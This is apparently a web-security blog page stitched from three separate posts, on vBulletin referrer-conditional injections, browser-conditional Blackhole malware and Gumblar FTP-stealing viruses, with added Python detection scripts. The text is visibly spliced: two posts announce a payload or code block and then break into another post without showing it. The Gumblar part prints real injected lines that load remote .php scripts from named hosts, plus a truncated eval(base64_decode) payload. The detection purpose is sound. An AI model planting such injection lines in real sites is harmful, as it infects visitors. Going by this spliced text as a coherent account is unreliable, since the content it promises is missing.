Sneaky vBulletin Script Injections

Over the past few weeks we have been seeing some nasty vBulletin infections that are proving difficult to find. In this post we describe the infection and what we did to remove it.

We recently wrote about conditional malware; this is another instance of it. Here the conditions key on specific referrers and user agents.

When a user reaches the forum from a Google search engine results page (SERP), they are served this payload:


Ask Sucuri: Why Do I Only Get Malware Warnings on Certain Browsers?

A few days ago our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site nothing happened and the malware wasn't displayed, so he probably assumed it was a false positive.

After a bit of manual testing we found that the malware was only served to certain browsers (IE and Chrome on Windows) and not to the others.
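The manual test described here, and the referrer/user-agent conditions in the vBulletin post above, can be scripted. The following is an added example, not Sucuri's scanner and not code from either infected site: it requests the same page under every referrer/User-Agent combination and reports external script or iframe sources that only appear for some of the combinations. The header strings, the `evil.example` host and the sample pages are constructed for the example; a real infected page may key on other things too (client IP, cookies) or serve each IP only once, so an absent hit is not proof of a clean site.

```python
"""Fetch one URL under several referrer/User-Agent combinations and report
script or iframe sources that only show up for some of them."""
import re
import sys
import urllib.request
from itertools import product

# The direct visit (how the site owner sees it) versus a visitor arriving
# from a Google SERP, each with a non-Windows and two Windows browsers.
# Header values are assumptions for the example, not captured traffic.
REFERRERS = {
    "direct": None,
    "google": "https://www.google.com/search?q=forum",
}
USER_AGENTS = {
    "linux-firefox": "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0",
    "win-ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "win-chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
}

# Injected payloads are almost always an externally loaded script or iframe.
SRC_RE = re.compile(r"<(?:script|iframe)[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def variants():
    """Yield (label, headers) for every referrer/User-Agent combination."""
    for (rname, referrer), (uname, ua) in product(REFERRERS.items(), USER_AGENTS.items()):
        headers = {"User-Agent": ua}
        if referrer:
            headers["Referer"] = referrer  # the HTTP header keeps its historical spelling
        yield f"{rname}/{uname}", headers

def fetch(url, headers):
    """Live fetch of one variant; only used when a URL is given on the command line."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")

def external_sources(html):
    """Set of src values of every script/iframe tag in the page."""
    return set(SRC_RE.findall(html))

def conditional_sources(bodies):
    """bodies: {variant_label: html}. Return {src: [labels]} for sources that
    appear in some variants but not in all of them; a source present in every
    variant is the site's own and is dropped."""
    seen = {}
    for label, html in bodies.items():
        for src in external_sources(html):
            seen.setdefault(src, []).append(label)
    return {src: sorted(labels) for src, labels in seen.items() if len(labels) < len(bodies)}

def probe(url):
    """Live probe: fetch every variant and diff them."""
    return conditional_sources({label: fetch(url, hdrs) for label, hdrs in variants()})

# Constructed offline sample: clean for a direct visit, but with an extra
# script when the referrer is Google and the browser is on Windows.
SAMPLE_CLEAN = '<html><head><script src="/js/site.js"></script></head><body>forum</body></html>'
SAMPLE_INFECTED = SAMPLE_CLEAN.replace(
    "</body>", '<script src="http://evil.example/x.php"></script></body>')

def sample_bodies():
    """What the constructed sample site would return for each variant."""
    bodies = {}
    for label, headers in variants():
        cloaked = "Referer" in headers and "Windows" in headers["User-Agent"]
        bodies[label] = SAMPLE_INFECTED if cloaked else SAMPLE_CLEAN
    return bodies

if __name__ == "__main__":
    result = probe(sys.argv[1]) if len(sys.argv) > 1 else conditional_sources(sample_bodies())
    for src, labels in sorted(result.items()):
        print(f"{src}\n  only served to: {', '.join(labels)}")
```

Run it with a URL as the first argument to probe a live site, or with no argument to see the offline sample, where `http://evil.example/x.php` is reported for the two Google/Windows variants only. Repeating the probe from a second IP address is worth the effort, since these kits often remember which visitors they have already hit.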

Once we got access to the site we learned why. It had the following code in the index.php file:


Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have to protect is your desktop.

Recently (well, since 2009) a large number of sites have been infected with malware and blacklisted because of a handful of desktop viruses (commonly referred to as Gumblar, "port 8080", etc.). These viruses steal your FTP password and then use it to do the following:

Infect every .js file on your site with entries like these:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

Infect every .html file with entries similar to these:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

Infect every PHP file with code similar to this one:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF..
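Cleaning up after one of these viruses means finding every file that carries one of the three patterns above. The following scanner is an added example, not Sucuri's tooling: it walks a document root and flags document.write()'d remote .php scripts in .js files, remote .php script tags in .html files, and eval(base64_decode(...)) in .php files. The rules are derived from the snippets quoted above and are deliberately narrow (a remote script only counts when its URL ends in .php), so treat a hit as something to inspect rather than something to delete automatically. The sample tree it builds for a dry run is constructed for the example and reuses the hostnames quoted above.

```python
"""Flag the three Gumblar-style injection patterns under a document root."""
import os
import re
import sys
import tempfile

# (file suffixes, label, pattern). The .js pattern is kept to one line so a
# document.write() early in a file cannot pair with a script tag far below it.
RULES = [
    ((".js",), "js-document-write-remote-script",
     re.compile(r"document\.write\s*\([^\n]*<script[^>]*\bsrc\s*=\s*[\"']?https?://[^\"'\s>]+\.php", re.I)),
    ((".html", ".htm"), "html-remote-php-script",
     re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?https?://[^\"'\s>]+\.php", re.I)),
    ((".php",), "php-eval-base64",
     re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I)),
]

def scan_file(path):
    """Return [(rule_label, line_number), ...] for one file, [] if clean."""
    suffix = os.path.splitext(path)[1].lower()
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return hits  # unreadable files are skipped, not reported as clean
    for suffixes, label, pattern in RULES:
        if suffix not in suffixes:
            continue
        for match in pattern.finditer(text):
            line_no = text.count("\n", 0, match.start()) + 1
            hits.append((label, line_no))
    return hits

def scan_tree(root):
    """Return {relative_posix_path: hits} for every file with at least one hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings

def build_sample_site():
    """Write a constructed document root (three infected files, three clean
    ones) to a temp dir and return its path. Sample content only."""
    root = tempfile.mkdtemp(prefix="gumblar-sample-")
    files = {
        "js/menu.js": (
            "function menu(){}\n"
            "document.write('<script src=\"http://wap.northernplumbingandheating.com"
            "/assets/postinfo.php\"></script>');\n"),
        "js/clean.js": "document.write('<div>hello</div>');\n",
        "index.html": (
            "<html><body>\n"
            "<script src=\"http://stb-umhau.de/images/muffin35.php\"></script>\n"
            "</body></html>\n"),
        "about.html": "<html><body><script src=\"/js/menu.js\"></script></body></html>\n",
        "config.php": (
            "<?php\n$x = 1;\n"
            "eval(base64_decode(\"aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcp\"));\n"),
        "lib.php": "<?php function ok() { return base64_encode('x'); }\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_site()
    for rel, hits in sorted(scan_tree(root).items()):
        for label, line_no in hits:
            print(f"{rel}:{line_no}: {label}")
```

Point it at a copy of the document root (or run it with no argument for the sample tree, which reports js/menu.js, index.html and config.php and nothing else). The eval(base64_decode()) rule also matches legitimate obfuscated code, including some commercial plugins, so decode the payload before deleting; and since the viruses work from stolen FTP credentials, cleaning the files is pointless until the desktop is cleaned and the password changed.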

